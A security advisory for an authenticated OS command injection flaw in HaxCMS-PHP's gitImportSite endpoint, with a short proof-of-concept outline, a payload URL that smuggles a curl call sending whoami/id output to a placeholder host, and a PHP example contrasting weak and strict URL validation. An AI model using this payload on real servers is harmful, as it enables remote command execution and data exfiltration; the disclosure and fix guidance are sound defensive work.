GHSA-g4cf-pp4x-hqgw: HaxCMS-PHP Command Injection Vulnerability
Summary
The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The 'set_remote' function later passes this input into 'proc_open', yielding OS command injection.
Details
The vulnerability exists in the logic of the 'gitImportSite' function, located in 'Operations.php'. The current implementation relies only on the 'filter_var' and 'strpos' functions to validate the URL, which is not sufficient to ensure the absence of the Bash special characters used for command injection.
Affected Resources
• Operations.php:2103 gitImportSite()
• <domain>/<user>/system/api/gitImportSite
PoC
To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note that a valid token must first be obtained by capturing a request to another API endpoint (such as 'archiveSite').
Start a web server.
Initiate a request to the 'archiveSite' endpoint.
Capture and modify the request in Burp Suite.
Observe command output in the HTTP request from the server.
Command Injection Payload
http://<IP>/.git;curl${IFS}<IP>/$(whoami)/$(id)#=abcdef
Impact
An authenticated attacker can craft a URL string that bypasses the validation checks employed by the 'filter_var' and 'strpos' functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.
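The following is an added example, not HaxCMS code: it contrasts the validation pattern described above (FILTER_VALIDATE_URL permits RFC 1738 characters such as ';', '$', '{', '}', '(' and ')', so the advisory's payload shape survives it) with a stricter allow-list check and a shell-free 'proc_open' call. The function names, the assumption that 'strpos' looks for '.git', the repository layout and the 203.0.113.5 address are all constructed for illustration.

```php
<?php
// Added example (not the project's code). Assumes PHP >= 7.4 for the
// array form of proc_open, which execs the program without a shell.

// Pattern from the advisory (assumption: strpos checks for '.git').
// filter_var keeps ';', '$', '{', '}', '(' and ')' because they are
// legal URL characters, so shell syntax passes this check.
function weakValidate(string $url): bool {
    return filter_var($url, FILTER_VALIDATE_URL) !== false
        && strpos($url, '.git') !== false;
}

// Allow-list check: http/https only, plain host, no credentials,
// query or fragment, and a path limited to a conservative alphabet.
function strictValidate(string $url): bool {
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        return false;
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return false;
    }
    foreach (['user', 'pass', 'query', 'fragment'] as $k) {
        if (isset($p[$k])) { return false; }
    }
    if (!preg_match('/^[A-Za-z0-9.-]+$/', $p['host'])) {
        return false;
    }
    return (bool) preg_match('#^/[A-Za-z0-9._/-]+\.git/?$#', $p['path'] ?? '');
}

// Shell-free invocation: argv is passed as an array, so the URL is one
// argument to git and is never interpreted as command-line text.
function setRemoteSafely(string $repoDir, string $url): int {
    if (!strictValidate($url)) {
        throw new InvalidArgumentException('rejected remote URL');
    }
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['git', 'remote', 'set-url', 'origin', $url], $spec, $pipes, $repoDir);
    if (!is_resource($proc)) { return -1; }
    fclose($pipes[1]);
    fclose($pipes[2]);
    return proc_close($proc);
}

// Constructed input shaped like the advisory's payload (documentation IP).
$sample = 'http://203.0.113.5/.git;curl${IFS}203.0.113.5/$(whoami)/$(id)#=abcdef';
var_dump(weakValidate($sample));
var_dump(strictValidate($sample));
```

Even with the array form of 'proc_open', the allow-list check is still worth keeping, because git itself interprets some URL syntaxes (for example local paths and ext:: helpers) in ways a remote-import feature should not expose.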
References
- GHSA-g4cf-pp4x-hqgw
- haxtheweb/haxcms-nodejs@5131fea
- https://nvd.nist.gov/vuln/detail/CVE-2025-49141